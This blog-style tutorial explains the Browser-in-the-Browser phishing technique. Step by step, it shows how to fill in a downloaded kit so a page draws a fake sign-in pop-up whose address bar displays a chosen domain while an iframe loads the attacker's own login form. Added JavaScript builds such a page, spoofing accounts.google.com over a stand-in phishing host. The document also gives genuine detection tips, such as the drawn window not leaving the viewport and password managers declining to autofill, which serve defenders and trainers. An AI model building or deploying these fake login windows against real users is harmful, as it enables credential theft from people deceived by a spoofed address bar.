A PHISHING TECHNIQUE FORBIDDEN FROM OUR WORLD

INTRODUCTION

Hi everyone, I hope you are all doing well. In this Browser in the Browser attack tutorial we are going to look at a recent phishing technique, the Browser in the Browser (BITB) attack. Before we jump into the article, can you spot the difference between the two images below?

[Image: Phishing website vs. real website, from here]

If you are not familiar with phishing, in simple terms it is an online attack used to steal sensitive information such as credentials and credit card details. A short example: suppose you copy the source code of Facebook's login page and host it on your own server. You then send the link to a friend saying, "Hey bro, I just got $100 by using this website, you just need to log in to this website through your Facebook account and you are done!" If your friend trusts you enough to log in on your copy, the username and password are submitted to your server instead of Facebook's. BOOM! You now have their Facebook credentials!

According to Cisco, "Phishing attacks are the practice of sending fraudulent communications that appear to come from a reputable source. It is usually done through email. The goal is to steal sensitive data like credit card and login information, or to install malware on the victim's machine. Phishing is a common type of cyber attack that everyone should learn about in order to protect themselves."

WHAT IS BROWSER IN THE BROWSER ATTACK?

Before we begin, have you ever encountered a web page like the one below?

Source: https://mrd0x.com/

I think most of us are already familiar with this type of page. We click "Sign in with Google" or "Sign in with Facebook", a small window pops up, we enter our credentials, and everything looks fine, right? This is exactly where a Browser in the Browser attack catches people. Normally that pop-up is a real, separate browser window (opened with window.open) with its own address bar that shows the identity provider's genuine URL. In a BITB attack, clicking "Sign in with Google" does not open a window at all. The malicious page draws a fake window with HTML and CSS, complete with a title bar, a padlock icon and an address bar that displays whatever URL the attacker chooses, and loads its own fake login form inside it. Everything inside that "window" is still part of the attacker's page, so the credentials you type go straight to the attacker, while the only genuine address bar, the one at the top of your real browser, still shows the attacker's domain. Two quick checks expose the trick: a real pop-up can be dragged outside the edge of the browser window, whereas the fake one cannot leave the page that draws it, and a password manager will refuse to autofill because the origin of the fake form does not match the site the credentials were saved for.

Here is what mrd0x (the researcher who published the technique) has to say: "Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it's basically indistinguishable."

BROWSER IN THE BROWSER ATTACK TUTORIAL

Now we will learn how to perform this attack. Follow these steps:

1- Download the file from here.

2- Open the folder that matches the operating system, browser and theme you want to imitate, for example "Windows-Chrome-DarkMode". The window design is OS- and theme-specific, so a Windows dark-mode window shown to a macOS user in light mode stands out.

3- Open the index.html file in Notepad (or any text editor).

4- Modify the following in index.html:

XX-TITLE-XX -> the title you want shown in the fake window's title bar.

XX-DOMAIN-NAME-XX -> the domain name the fake address bar should display (like microsoft.com).

XX-DOMAIN-PATH-XX -> the path shown after the domain in the fake address bar (like auth/signin).

XX-PHISHING-LINK-XX -> the URL of your actual phishing page, which is loaded in the iframe inside the fake window (like yourphishingwebsite.com/). This is a separate page you host yourself; the provider's real sign-in page cannot simply be framed, because identity providers typically block framing with X-Frame-Options or CSP frame-ancestors.

5- Save the file and open index.html in a browser. You should see a fake pop-up window whose drawn address bar shows the domain and path you entered, something like this:

Output
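As an added example (my own code, not the original post's template or mrd0x's), here is the placeholder substitution of step 4 done in JavaScript, together with a stripped-down version of the window design, so that the fake address bar and the framed phishing page can be seen side by side. The title, the displayed domain and path, and the phish.example.test link are made-up values chosen for illustration:

```javascript
// Added example, not code from the original post or from mrd0x's BITB
// templates: the placeholder substitution of steps 1-5 done programmatically,
// next to a minimal version of the fake window so both halves of a BITB page
// (the drawn window and the framed phishing form) are visible in one place.
// The phishing host below is made up for illustration.

// Escape a value before writing it into HTML, so quotes or angle brackets in
// a title or URL cannot break the attribute or element they land in.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Replace every XX-NAME-XX placeholder (the naming the downloaded template
// uses). A placeholder with no value is an error: a leftover "XX-TITLE-XX"
// rendered in the fake title bar would give the page away immediately.
function fillTemplate(template, values) {
  return template.replace(/XX-([A-Z-]+?)-XX/g, (match, key) => {
    if (!(key in values)) throw new Error(`no value for placeholder ${match}`);
    return escapeHtml(values[key]);
  });
}

// Minimal stand-in for the template's window design: a fixed-position box
// with a title bar, a fake address bar and an iframe. The real templates add
// OS- and theme-specific chrome (hence the "Windows-Chrome-DarkMode" folder).
const WINDOW_TEMPLATE = `<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>XX-TITLE-XX</title>
<style>
  #bitb     { position: fixed; top: 80px; left: 120px; width: 480px;
              border: 1px solid #888; background: #fff; font-family: sans-serif; }
  #titlebar { background: #202124; color: #fff; padding: 6px 10px; }
  #urlbar   { background: #f1f3f4; color: #202124; padding: 6px 10px; }
  #content  { width: 100%; height: 480px; border: 0; }
</style></head>
<body>
<div id="bitb">
  <div id="titlebar">XX-TITLE-XX</div>
  <!-- Padlock and URL are plain text chosen by the attacker; the browser
       has no part in rendering this "address bar". -->
  <div id="urlbar">&#128274; https://XX-DOMAIN-NAME-XX/XX-DOMAIN-PATH-XX</div>
  <!-- The form comes from the attacker's own host. The genuine provider's
       login page cannot simply be framed here: identity providers typically
       send X-Frame-Options / CSP frame-ancestors and the browser refuses to
       load them in an iframe, which is why the kit needs its own phishing page. -->
  <iframe id="content" src="XX-PHISHING-LINK-XX"></iframe>
</div>
</body></html>`;

// Equivalent of editing index.html by hand in step 4.
function buildBitbPage(opts) {
  return fillTemplate(WINDOW_TEMPLATE, {
    'TITLE': opts.title,
    'DOMAIN-NAME': opts.domain,
    'DOMAIN-PATH': opts.path,
    'PHISHING-LINK': opts.phishingLink,
  });
}

// What the victim reads in the fake address bar versus where the form is
// really loaded from. The gap between the two is the attack; the defence is
// that the real browser address bar at the top still shows the attacker's origin.
function describe(html) {
  const shown = html.match(/https:\/\/[^<\s]+/);
  const real = html.match(/<iframe[^>]*\ssrc="([^"]+)"/);
  return { shown: shown ? shown[0] : null, real: real ? real[1] : null };
}

// Constructed values; phish.example.test does not exist.
const EXAMPLE = {
  title: 'Sign in - Google Accounts',
  domain: 'accounts.google.com',
  path: 'o/oauth2/auth',
  phishingLink: 'https://phish.example.test/google-login.html',
};

console.log(describe(buildBitbPage(EXAMPLE)));
// { shown: 'https://accounts.google.com/o/oauth2/auth',
//   real: 'https://phish.example.test/google-login.html' }
```

Save the string returned by buildBitbPage as index.html and open it: the drawn window shows https://accounts.google.com/... in its fake address bar, while the browser's own address bar at the top shows file:// (or, once hosted, the attacker's domain). That mismatch, together with the fact that the drawn window cannot be dragged outside the browser viewport, is what a careful user or an analyst triaging a reported phish should look for.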

CONCLUSION

I hope this tutorial has helped you understand the Browser in the Browser attack. You can read more about it here.

Update: download the BITB file here. For a walkthrough of how to use the tool, watch this video.
